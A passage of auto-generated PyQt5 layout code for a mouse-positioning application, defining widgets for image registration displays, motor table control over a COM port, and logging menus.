self.TableTxt_x.setObjectName("TableTxt_x")
self.gridLayout_2.addWidget(self.TableTxt_x, 0, 1, 1, 1)
self.label_58 = QtWidgets.QLabel(self.groupBox_10)
font = QtGui.QFont()
font.setPointSize(10)
self.label_58.setFont(font)
self.label_58.setObjectName("label_58")
self.gridLayout_2.addWidget(self.label_58, 1, 2, 1, 1)
self.verticalLayout_2.addWidget(self.groupBox_10)
self.Group_Result = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Group_Result.sizePolicy().hasHeightForWidth())
self.Group_Result.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.Group_Result.setFont(font)
self.Group_Result.setObjectName("Group_Result")
self.gridLayout_8 = QtWidgets.QGridLayout(self.Group_Result)
self.gridLayout_8.setObjectName("gridLayout_8")
self.TableTxt_yCorr = QtWidgets.QLineEdit(self.Group_Result)
self.TableTxt_yCorr.setEnabled(False)
self.TableTxt_yCorr.setMinimumSize(QtCore.QSize(40, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TableTxt_yCorr.setFont(font)
self.TableTxt_yCorr.setObjectName("TableTxt_yCorr")
self.gridLayout_8.addWidget(self.TableTxt_yCorr, 1, 1, 1, 1)
self.label_9 = QtWidgets.QLabel(self.Group_Result)
font = QtGui.QFont()
font.setPointSize(10)
self.label_9.setFont(font)
self.label_9.setObjectName("label_9")
self.gridLayout_8.addWidget(self.label_9, 0, 0, 1, 1)
self.TableTxt_xCorr = QtWidgets.QLineEdit(self.Group_Result)
self.TableTxt_xCorr.setEnabled(False)
self.TableTxt_xCorr.setMinimumSize(QtCore.QSize(40, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TableTxt_xCorr.setFont(font)
self.TableTxt_xCorr.setObjectName("TableTxt_xCorr")
self.gridLayout_8.addWidget(self.TableTxt_xCorr, 0, 1, 1, 1)
self.label_59 = QtWidgets.QLabel(self.Group_Result)
font = QtGui.QFont()
font.setPointSize(10)
self.label_59.setFont(font)
self.label_59.setObjectName("label_59")
self.gridLayout_8.addWidget(self.label_59, 0, 2, 1, 1)
self.label_60 = QtWidgets.QLabel(self.Group_Result)
font = QtGui.QFont()
font.setPointSize(10)
self.label_60.setFont(font)
self.label_60.setObjectName("label_60")
self.gridLayout_8.addWidget(self.label_60, 1, 2, 1, 1)
self.label_10 = QtWidgets.QLabel(self.Group_Result)
font = QtGui.QFont()
font.setPointSize(10)
self.label_10.setFont(font)
self.label_10.setObjectName("label_10")
self.gridLayout_8.addWidget(self.label_10, 1, 0, 1, 1)
self.verticalLayout_2.addWidget(self.Group_Result)
self.gridLayout_4.addLayout(self.verticalLayout_2, 0, 4, 3, 1)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_4.addItem(spacerItem2, 0, 5, 1, 1)
self.groupBox_22 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_22.sizePolicy().hasHeightForWidth())
self.groupBox_22.setSizePolicy(sizePolicy)
self.groupBox_22.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox_22.setObjectName("groupBox_22")
self.Label_Trafo_Params = QtWidgets.QLabel(self.groupBox_22)
self.Label_Trafo_Params.setGeometry(QtCore.QRect(10, 42, 59, 16))
self.Label_Trafo_Params.setObjectName("Label_Trafo_Params")
self.label_15 = QtWidgets.QLabel(self.groupBox_22)
self.label_15.setGeometry(QtCore.QRect(10, 23, 98, 16))
self.label_15.setObjectName("label_15")
self.gridLayout_4.addWidget(self.groupBox_22, 1, 2, 2, 1)
self.groupBox_24 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_24.sizePolicy().hasHeightForWidth())
self.groupBox_24.setSizePolicy(sizePolicy)
self.groupBox_24.setMinimumSize(QtCore.QSize(0, 150))
self.groupBox_24.setObjectName("groupBox_24")
self.gridLayout_51 = QtWidgets.QGridLayout(self.groupBox_24)
self.gridLayout_51.setObjectName("gridLayout_51")
self.splitter_8 = QtWidgets.QSplitter(self.groupBox_24)
self.splitter_8.setOrientation(QtCore.Qt.Horizontal)
self.splitter_8.setObjectName("splitter_8")
self.splitter_7 = QtWidgets.QSplitter(self.splitter_8)
self.splitter_7.setOrientation(QtCore.Qt.Vertical)
self.splitter_7.setObjectName("splitter_7")
self.label_19 = QtWidgets.QLabel(self.splitter_7)
self.label_19.setObjectName("label_19")
self.label_20 = QtWidgets.QLabel(self.splitter_7)
self.label_20.setObjectName("label_20")
self.splitter_6 = QtWidgets.QSplitter(self.splitter_8)
self.splitter_6.setOrientation(QtCore.Qt.Horizontal)
self.splitter_6.setObjectName("splitter_6")
self.splitter_5 = QtWidgets.QSplitter(self.splitter_6)
self.splitter_5.setOrientation(QtCore.Qt.Vertical)
self.splitter_5.setObjectName("splitter_5")
self.Box_MotorOriginX = QtWidgets.QDoubleSpinBox(self.splitter_5)
self.Box_MotorOriginX.setEnabled(True)
self.Box_MotorOriginX.setDecimals(3)
self.Box_MotorOriginX.setMaximum(1000.0)
self.Box_MotorOriginX.setObjectName("Box_MotorOriginX")
self.Box_MotorOriginY = QtWidgets.QDoubleSpinBox(self.splitter_5)
self.Box_MotorOriginY.setDecimals(3)
self.Box_MotorOriginY.setMaximum(1000.0)
self.Box_MotorOriginY.setObjectName("Box_MotorOriginY")
self.Btn_setMotor_Origin = QtWidgets.QPushButton(self.splitter_6)
self.Btn_setMotor_Origin.setObjectName("Btn_setMotor_Origin")
self.gridLayout_51.addWidget(self.splitter_8, 1, 0, 1, 1)
self.Btn_getCurrentMotor = QtWidgets.QPushButton(self.groupBox_24)
self.Btn_getCurrentMotor.setObjectName("Btn_getCurrentMotor")
self.gridLayout_51.addWidget(self.Btn_getCurrentMotor, 0, 0, 1, 1)
self.Btn_Reg_calcTable = QtWidgets.QPushButton(self.groupBox_24)
self.Btn_Reg_calcTable.setObjectName("Btn_Reg_calcTable")
self.gridLayout_51.addWidget(self.Btn_Reg_calcTable, 2, 0, 1, 1)
spacerItem3 = QtWidgets.QSpacerItem(20, 55, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_51.addItem(spacerItem3, 3, 0, 1, 1)
self.gridLayout_4.addWidget(self.groupBox_24, 0, 3, 3, 1)
self.groupBox_23 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_23.sizePolicy().hasHeightForWidth())
self.groupBox_23.setSizePolicy(sizePolicy)
self.groupBox_23.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox_23.setMaximumSize(QtCore.QSize(1000000, 100000))
self.groupBox_23.setObjectName("groupBox_23")
self.gridLayout_12 = QtWidgets.QGridLayout(self.groupBox_23)
self.gridLayout_12.setObjectName("gridLayout_12")
self.table_TrgCoords = QtWidgets.QTableWidget(self.groupBox_23)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.table_TrgCoords.sizePolicy().hasHeightForWidth())
self.table_TrgCoords.setSizePolicy(sizePolicy)
self.table_TrgCoords.setMinimumSize(QtCore.QSize(0, 0))
self.table_TrgCoords.setMaximumSize(QtCore.QSize(200, 16777215))
self.table_TrgCoords.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.table_TrgCoords.setObjectName("table_TrgCoords")
self.table_TrgCoords.setColumnCount(2)
self.table_TrgCoords.setRowCount(2)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setVerticalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setVerticalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setItem(0, 0, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setItem(1, 0, item)
self.table_TrgCoords.horizontalHeader().setDefaultSectionSize(58)
self.table_TrgCoords.horizontalHeader().setMinimumSectionSize(40)
self.table_TrgCoords.verticalHeader().setDefaultSectionSize(30)
self.gridLayout_12.addWidget(self.table_TrgCoords, 0, 0, 1, 2)
self.Button_flip_layers = QtWidgets.QPushButton(self.groupBox_23)
self.Button_flip_layers.setMaximumSize(QtCore.QSize(16777215, 25))
self.Button_flip_layers.setObjectName("Button_flip_layers")
self.gridLayout_12.addWidget(self.Button_flip_layers, 1, 0, 1, 1)
self.Button_show_Atlas = QtWidgets.QPushButton(self.groupBox_23)
self.Button_show_Atlas.setMaximumSize(QtCore.QSize(16777215, 25))
self.Button_show_Atlas.setObjectName("Button_show_Atlas")
self.gridLayout_12.addWidget(self.Button_show_Atlas, 1, 1, 1, 1)
spacerItem4 = QtWidgets.QSpacerItem(17, 37, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_12.addItem(spacerItem4, 2, 0, 1, 1)
self.gridLayout_4.addWidget(self.groupBox_23, 0, 1, 3, 1)
self.gridLayout_11.addWidget(self.frame_4, 1, 0, 1, 3)
self.groupBox_18 = QtWidgets.QGroupBox(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_18.sizePolicy().hasHeightForWidth())
self.groupBox_18.setSizePolicy(sizePolicy)
self.groupBox_18.setObjectName("groupBox_18")
self.verticalLayout = QtWidgets.QVBoxLayout(self.groupBox_18)
self.verticalLayout.setObjectName("verticalLayout")
self.Graybar_Moving = matplotlibWidget(self.groupBox_18)
self.Graybar_Moving.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Graybar_Moving.sizePolicy().hasHeightForWidth())
self.Graybar_Moving.setSizePolicy(sizePolicy)
self.Graybar_Moving.setMinimumSize(QtCore.QSize(0, 80))
self.Graybar_Moving.setMaximumSize(QtCore.QSize(1000000, 100))
self.Graybar_Moving.setObjectName("Graybar_Moving")
self.verticalLayout.addWidget(self.Graybar_Moving)
self.Display_Moving = matplotlibWidget(self.groupBox_18)
self.Display_Moving.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Moving.sizePolicy().hasHeightForWidth())
self.Display_Moving.setSizePolicy(sizePolicy)
self.Display_Moving.setMinimumSize(QtCore.QSize(300, 100))
self.Display_Moving.setMaximumSize(QtCore.QSize(1000000, 1000000))
self.Display_Moving.setObjectName("Display_Moving")
self.verticalLayout.addWidget(self.Display_Moving)
self.Button_load_moving = QtWidgets.QPushButton(self.groupBox_18)
self.Button_load_moving.setMaximumSize(QtCore.QSize(16777215, 25))
self.Button_load_moving.setObjectName("Button_load_moving")
self.verticalLayout.addWidget(self.Button_load_moving)
self.Label_Moving = QtWidgets.QLabel(self.groupBox_18)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Label_Moving.sizePolicy().hasHeightForWidth())
self.Label_Moving.setSizePolicy(sizePolicy)
self.Label_Moving.setMinimumSize(QtCore.QSize(0, 20))
self.Label_Moving.setMaximumSize(QtCore.QSize(16777215, 40))
self.Label_Moving.setText("")
self.Label_Moving.setObjectName("Label_Moving")
self.verticalLayout.addWidget(self.Label_Moving)
self.gridLayout_11.addWidget(self.groupBox_18, 0, 0, 1, 1)
self.groupBox_19 = QtWidgets.QGroupBox(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_19.sizePolicy().hasHeightForWidth())
self.groupBox_19.setSizePolicy(sizePolicy)
self.groupBox_19.setObjectName("groupBox_19")
self.gridLayout_45 = QtWidgets.QGridLayout(self.groupBox_19)
self.gridLayout_45.setObjectName("gridLayout_45")
self.Display_Fixed = matplotlibWidget(self.groupBox_19)
self.Display_Fixed.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Fixed.sizePolicy().hasHeightForWidth())
self.Display_Fixed.setSizePolicy(sizePolicy)
self.Display_Fixed.setMinimumSize(QtCore.QSize(300, 300))
self.Display_Fixed.setMaximumSize(QtCore.QSize(1000000, 1000000))
self.Display_Fixed.setObjectName("Display_Fixed")
self.gridLayout_45.addWidget(self.Display_Fixed, 1, 0, 1, 1)
self.Button_load_fixed = QtWidgets.QPushButton(self.groupBox_19)
self.Button_load_fixed.setMaximumSize(QtCore.QSize(16777215, 25))
self.Button_load_fixed.setObjectName("Button_load_fixed")
self.gridLayout_45.addWidget(self.Button_load_fixed, 2, 0, 1, 1)
self.Label_Fixed = QtWidgets.QLabel(self.groupBox_19)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Label_Fixed.sizePolicy().hasHeightForWidth())
self.Label_Fixed.setSizePolicy(sizePolicy)
self.Label_Fixed.setMinimumSize(QtCore.QSize(0, 0))
self.Label_Fixed.setMaximumSize(QtCore.QSize(16777215, 40))
self.Label_Fixed.setText("")
self.Label_Fixed.setObjectName("Label_Fixed")
self.gridLayout_45.addWidget(self.Label_Fixed, 3, 0, 1, 1)
self.Graybar_Fixed = matplotlibWidget(self.groupBox_19)
self.Graybar_Fixed.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Graybar_Fixed.sizePolicy().hasHeightForWidth())
self.Graybar_Fixed.setSizePolicy(sizePolicy)
self.Graybar_Fixed.setMinimumSize(QtCore.QSize(0, 80))
self.Graybar_Fixed.setMaximumSize(QtCore.QSize(1000000, 100))
self.Graybar_Fixed.setObjectName("Graybar_Fixed")
self.gridLayout_45.addWidget(self.Graybar_Fixed, 0, 0, 1, 1)
self.gridLayout_11.addWidget(self.groupBox_19, 0, 1, 1, 1)
self.Registration.addTab(self.tab, "")
self.TabMotor = QtWidgets.QWidget()
self.TabMotor.setObjectName("TabMotor")
self.gridLayout_42 = QtWidgets.QGridLayout(self.TabMotor)
self.gridLayout_42.setObjectName("gridLayout_42")
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_42.addItem(spacerItem5, 0, 3, 1, 1)
self.groupBox_6 = QtWidgets.QGroupBox(self.TabMotor)
self.groupBox_6.setObjectName("groupBox_6")
self.gridLayout_7 = QtWidgets.QGridLayout(self.groupBox_6)
self.gridLayout_7.setObjectName("gridLayout_7")
self.BoxTableCOM = QtWidgets.QFrame(self.groupBox_6)
self.BoxTableCOM.setMinimumSize(QtCore.QSize(0, 20))
self.BoxTableCOM.setAutoFillBackground(False)
self.BoxTableCOM.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.BoxTableCOM.setFrameShadow(QtWidgets.QFrame.Sunken)
self.BoxTableCOM.setObjectName("BoxTableCOM")
self.gridLayout_39 = QtWidgets.QGridLayout(self.BoxTableCOM)
self.gridLayout_39.setObjectName("gridLayout_39")
self.LabelCOM = QtWidgets.QLabel(self.BoxTableCOM)
self.LabelCOM.setAlignment(QtCore.Qt.AlignCenter)
self.LabelCOM.setObjectName("LabelCOM")
self.gridLayout_39.addWidget(self.LabelCOM, 0, 0, 1, 1)
self.gridLayout_7.addWidget(self.BoxTableCOM, 7, 0, 1, 1)
self.BoxTableLimits = QtWidgets.QFrame(self.groupBox_6)
self.BoxTableLimits.setMinimumSize(QtCore.QSize(0, 20))
self.BoxTableLimits.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.BoxTableLimits.setFrameShadow(QtWidgets.QFrame.Sunken)
self.BoxTableLimits.setObjectName("BoxTableLimits")
self.gridLayout_41 = QtWidgets.QGridLayout(self.BoxTableLimits)
self.gridLayout_41.setObjectName("gridLayout_41")
self.LabelREF = QtWidgets.QLabel(self.BoxTableLimits)
self.LabelREF.setAlignment(QtCore.Qt.AlignCenter)
self.LabelREF.setObjectName("LabelREF")
self.gridLayout_41.addWidget(self.LabelREF, 0, 0, 1, 1)
self.gridLayout_7.addWidget(self.BoxTableLimits, 9, 0, 1, 1)
spacerItem6 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_7.addItem(spacerItem6, 6, 0, 1, 1)
self.label_2 = QtWidgets.QLabel(self.groupBox_6)
self.label_2.setObjectName("label_2")
self.gridLayout_7.addWidget(self.label_2, 4, 0, 1, 1)
self.Label_COMPort = QtWidgets.QLabel(self.groupBox_6)
font = QtGui.QFont()
font.setPointSize(10)
self.Label_COMPort.setFont(font)
self.Label_COMPort.setObjectName("Label_COMPort")
self.gridLayout_7.addWidget(self.Label_COMPort, 0, 0, 1, 1)
self.QComboBox_ListOfPorts = QtWidgets.QComboBox(self.groupBox_6)
self.QComboBox_ListOfPorts.setEnabled(True)
self.QComboBox_ListOfPorts.setObjectName("QComboBox_ListOfPorts")
self.gridLayout_7.addWidget(self.QComboBox_ListOfPorts, 1, 0, 1, 1)
self.Button_MotorInit = QtWidgets.QPushButton(self.groupBox_6)
self.Button_MotorInit.setObjectName("Button_MotorInit")
self.gridLayout_7.addWidget(self.Button_MotorInit, 2, 0, 1, 1)
self.Button_MotorDisconnect = QtWidgets.QPushButton(self.groupBox_6)
self.Button_MotorDisconnect.setObjectName("Button_MotorDisconnect")
self.gridLayout_7.addWidget(self.Button_MotorDisconnect, 3, 0, 1, 1)
self.CBoxABSREL = QtWidgets.QComboBox(self.groupBox_6)
self.CBoxABSREL.setMinimumSize(QtCore.QSize(100, 0))
self.CBoxABSREL.setCurrentText("")
self.CBoxABSREL.setObjectName("CBoxABSREL")
self.gridLayout_7.addWidget(self.CBoxABSREL, 5, 0, 1, 1)
self.BoxTableInit = QtWidgets.QFrame(self.groupBox_6)
self.BoxTableInit.setMinimumSize(QtCore.QSize(0, 20))
self.BoxTableInit.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.BoxTableInit.setFrameShadow(QtWidgets.QFrame.Sunken)
self.BoxTableInit.setObjectName("BoxTableInit")
self.gridLayout_40 = QtWidgets.QGridLayout(self.BoxTableInit)
self.gridLayout_40.setObjectName("gridLayout_40")
self.LabelINIT = QtWidgets.QLabel(self.BoxTableInit)
self.LabelINIT.setAlignment(QtCore.Qt.AlignCenter)
self.LabelINIT.setObjectName("LabelINIT")
self.gridLayout_40.addWidget(self.LabelINIT, 0, 0, 1, 1)
self.gridLayout_7.addWidget(self.BoxTableInit, 10, 0, 1, 1)
self.gridLayout_42.addWidget(self.groupBox_6, 0, 0, 2, 1)
self.splitter_3 = QtWidgets.QSplitter(self.TabMotor)
self.splitter_3.setOrientation(QtCore.Qt.Vertical)
self.splitter_3.setObjectName("splitter_3")
self.groupBox_4 = QtWidgets.QGroupBox(self.splitter_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_4.sizePolicy().hasHeightForWidth())
self.groupBox_4.setSizePolicy(sizePolicy)
self.groupBox_4.setObjectName("groupBox_4")
self.gridLayout_25 = QtWidgets.QGridLayout(self.groupBox_4)
self.gridLayout_25.setObjectName("gridLayout_25")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_4 = QtWidgets.QLabel(self.groupBox_4)
self.label_4.setObjectName("label_4")
self.horizontalLayout_4.addWidget(self.label_4)
self.TablePosX = QtWidgets.QLineEdit(self.groupBox_4)
self.TablePosX.setEnabled(False)
self.TablePosX.setObjectName("TablePosX")
self.horizontalLayout_4.addWidget(self.TablePosX)
self.label_66 = QtWidgets.QLabel(self.groupBox_4)
self.label_66.setObjectName("label_66")
self.horizontalLayout_4.addWidget(self.label_66)
self.gridLayout_25.addLayout(self.horizontalLayout_4, 0, 0, 1, 1)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.label_64 = QtWidgets.QLabel(self.groupBox_4)
self.label_64.setObjectName("label_64")
self.horizontalLayout_3.addWidget(self.label_64)
self.TablePosY = QtWidgets.QLineEdit(self.groupBox_4)
self.TablePosY.setEnabled(False)
self.TablePosY.setObjectName("TablePosY")
self.horizontalLayout_3.addWidget(self.TablePosY)
self.label_65 = QtWidgets.QLabel(self.groupBox_4)
self.label_65.setObjectName("label_65")
self.horizontalLayout_3.addWidget(self.label_65)
self.gridLayout_25.addLayout(self.horizontalLayout_3, 1, 0, 1, 1)
spacerItem7 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_25.addItem(spacerItem7, 2, 0, 1, 1)
self.groupBox_13 = QtWidgets.QGroupBox(self.splitter_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_13.sizePolicy().hasHeightForWidth())
self.groupBox_13.setSizePolicy(sizePolicy)
self.groupBox_13.setMinimumSize(QtCore.QSize(0, 200))
self.groupBox_13.setObjectName("groupBox_13")
self.gridLayout_34 = QtWidgets.QGridLayout(self.groupBox_13)
self.gridLayout_34.setObjectName("gridLayout_34")
self.Button_MoveTable = QtWidgets.QPushButton(self.groupBox_13)
self.Button_MoveTable.setObjectName("Button_MoveTable")
self.gridLayout_34.addWidget(self.Button_MoveTable, 2, 0, 1, 1)
self.Button_StopTable = QtWidgets.QPushButton(self.groupBox_13)
self.Button_StopTable.setObjectName("Button_StopTable")
self.gridLayout_34.addWidget(self.Button_StopTable, 3, 0, 1, 1)
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.label_69 = QtWidgets.QLabel(self.groupBox_13)
self.label_69.setObjectName("label_69")
self.horizontalLayout_7.addWidget(self.label_69)
self.SpinBoxTabley = QtWidgets.QDoubleSpinBox(self.groupBox_13)
self.SpinBoxTabley.setDecimals(3)
self.SpinBoxTabley.setMinimum(-70000.0)
self.SpinBoxTabley.setMaximum(70000.0)
self.SpinBoxTabley.setSingleStep(0.1)
self.SpinBoxTabley.setObjectName("SpinBoxTabley")
self.horizontalLayout_7.addWidget(self.SpinBoxTabley)
self.label_70 = QtWidgets.QLabel(self.groupBox_13)
self.label_70.setObjectName("label_70")
self.horizontalLayout_7.addWidget(self.label_70)
self.gridLayout_34.addLayout(self.horizontalLayout_7, 1, 0, 1, 1)
spacerItem8 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_34.addItem(spacerItem8, 5, 0, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.label_67 = QtWidgets.QLabel(self.groupBox_13)
self.label_67.setObjectName("label_67")
self.horizontalLayout_6.addWidget(self.label_67)
self.SpinBoxTablex = QtWidgets.QDoubleSpinBox(self.groupBox_13)
self.SpinBoxTablex.setDecimals(3)
self.SpinBoxTablex.setMinimum(-70000.0)
self.SpinBoxTablex.setMaximum(70000.0)
self.SpinBoxTablex.setSingleStep(0.1)
self.SpinBoxTablex.setObjectName("SpinBoxTablex")
self.horizontalLayout_6.addWidget(self.SpinBoxTablex)
self.label_68 = QtWidgets.QLabel(self.groupBox_13)
self.label_68.setObjectName("label_68")
self.horizontalLayout_6.addWidget(self.label_68)
self.gridLayout_34.addLayout(self.horizontalLayout_6, 0, 0, 1, 1)
self.ButtonCopyCoordinates = QtWidgets.QPushButton(self.groupBox_13)
self.ButtonCopyCoordinates.setObjectName("ButtonCopyCoordinates")
self.gridLayout_34.addWidget(self.ButtonCopyCoordinates, 4, 0, 1, 1)
self.gridLayout_42.addWidget(self.splitter_3, 0, 1, 1, 2)
spacerItem9 = QtWidgets.QSpacerItem(108, 118, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_42.addItem(spacerItem9, 1, 2, 1, 1)
self.Registration.addTab(self.TabMotor, "")
self.gridLayout_50.addWidget(self.Registration, 0, 0, 1, 1)
Mouse_Positioning_Interface.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(Mouse_Positioning_Interface)
self.statusbar.setObjectName("statusbar")
Mouse_Positioning_Interface.setStatusBar(self.statusbar)
self.menuBar = QtWidgets.QMenuBar(Mouse_Positioning_Interface)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 1708, 21))
self.menuBar.setObjectName("menuBar")
self.menuActions = QtWidgets.QMenu(self.menuBar)
self.menuActions.setObjectName("menuActions")
self.menuOptions = QtWidgets.QMenu(self.menuBar)
self.menuOptions.setObjectName("menuOptions")
self.menuLog_Level = QtWidgets.QMenu(self.menuOptions)
self.menuLog_Level.setObjectName("menuLog_Level")
self.menuUtils = QtWidgets.QMenu(self.menuBar)
self.menuUtils.setObjectName("menuUtils")
Mouse_Positioning_Interface.setMenuBar(self.menuBar)
self.actionLoad_Radiography_scatter = QtWidgets.QAction(Mouse_Positioning_Interface)
self.actionLoad_Radiography_scatter.setObjectName("actionLoad_Radiography_scatter")
self.action_SaveLogfile = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_SaveLogfile.setObjectName("action_SaveLogfile")
self.action_Exit = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_Exit.setObjectName("action_Exit")
self.actionRestore_Old_Session = QtWidgets.QAction(Mouse_Positioning_Interface)
self.actionRestore_Old_Session.setObjectName("actionRestore_Old_Session")
self.action_LogLevel_Info = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_LogLevel_Info.setCheckable(True)
self.action_LogLevel_Info.setObjectName("action_LogLevel_Info")
self.action_LogLevel_Debug = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_LogLevel_Debug.setCheckable(True)
self.action_LogLevel_Debug.setObjectName("action_LogLevel_Debug")
self.action_Log_Serial_Com = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_Log_Serial_Com.setCheckable(True)
self.action_Log_Serial_Com.setObjectName("action_Log_Serial_Com")
self.actionSet_Logfile_Directory = QtWidgets.QAction(Mouse_Positioning_Interface)
self.actionSet_Logfile_Directory.setObjectName("actionSet_Logfile_Directory")
self.action_scan_COM_ports = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_scan_COM_ports.setObjectName("action_scan_COM_ports")
self.actionN2V_for_RG = QtWidgets.QAction(Mouse_Positioning_Interface)
self.actionN2V_for_RG.setObjectName("actionN2V_for_RG")
self.action_set_beam_diameter = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_set_beam_diameter.setObjectName("action_set_beam_diameter")
self.menuActions.addAction(self.action_Exit)
self.menuLog_Level.addAction(self.action_LogLevel_Info)
self.menuLog_Level.addAction(self.action_LogLevel_Debug)
self.menuOptions.addAction(self.menuLog_Level.menuAction())
self.menuOptions.addAction(self.action_Log_Serial_Com)
self.menuOptions.addAction(self.actionSet_Logfile_Directory)
self.menuUtils.addAction(self.action_scan_COM_ports)
self.menuUtils.addAction(self.actionN2V_for_RG)
self.menuUtils.addAction(self.action_set_beam_diameter)
